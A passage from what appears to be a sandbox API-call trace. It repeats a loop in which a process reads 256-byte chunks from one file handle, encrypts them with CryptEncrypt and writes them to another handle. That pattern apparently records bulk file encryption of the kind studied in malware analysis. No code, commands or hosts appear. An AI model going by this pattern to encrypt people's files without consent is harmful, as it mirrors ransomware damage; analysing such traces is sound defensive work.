lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.609] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.609] GetLastError () returned 0x0 [0153.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.609] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.609] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.609] GetLastError () returned 0x0 [0153.609] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.610] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.610] GetLastError () returned 0x0 [0153.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.610] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.610] GetLastError () returned 0x0 [0153.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.610] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.610] GetLastError () returned 0x0 [0153.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.610] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.610] GetLastError () returned 0x0 [0153.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.610] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.610] GetLastError () returned 0x0 [0153.610] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.610] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.611] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.611] GetLastError () returned 0x0 [0153.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.611] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.611] GetLastError () returned 0x0 [0153.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.611] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.611] GetLastError () returned 0x0 [0153.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.611] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.611] GetLastError () returned 0x0 [0153.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.611] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.611] GetLastError () returned 0x0 [0153.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.611] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.611] GetLastError () returned 0x0 [0153.611] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.611] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.611] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.612] GetLastError () returned 0x0 [0153.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.612] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.612] GetLastError () returned 0x0 [0153.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.612] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.612] GetLastError () returned 0x0 [0153.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.612] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.612] GetLastError () returned 0x0 [0153.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.612] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.612] GetLastError () returned 0x0 [0153.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.612] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.612] GetLastError () returned 0x0 [0153.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.612] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.612] GetLastError () returned 0x0 [0153.612] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.612] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.613] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.613] GetLastError () returned 0x0 [0153.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.613] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.613] GetLastError () returned 0x0 [0153.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.613] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.613] GetLastError () returned 0x0 [0153.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.613] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.613] GetLastError () returned 0x0 [0153.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.613] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.613] GetLastError () returned 0x0 [0153.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.613] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.613] GetLastError () returned 0x0 [0153.613] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.613] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.614] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.614] GetLastError () returned 0x0 [0153.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.614] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.614] GetLastError () returned 0x0 [0153.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.614] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.614] GetLastError () returned 0x0 [0153.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.614] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.614] GetLastError () returned 0x0 [0153.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.614] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.614] GetLastError () returned 0x0 [0153.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.614] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.614] GetLastError () returned 0x0 [0153.614] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.614] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.614] CryptEncrypt (in: 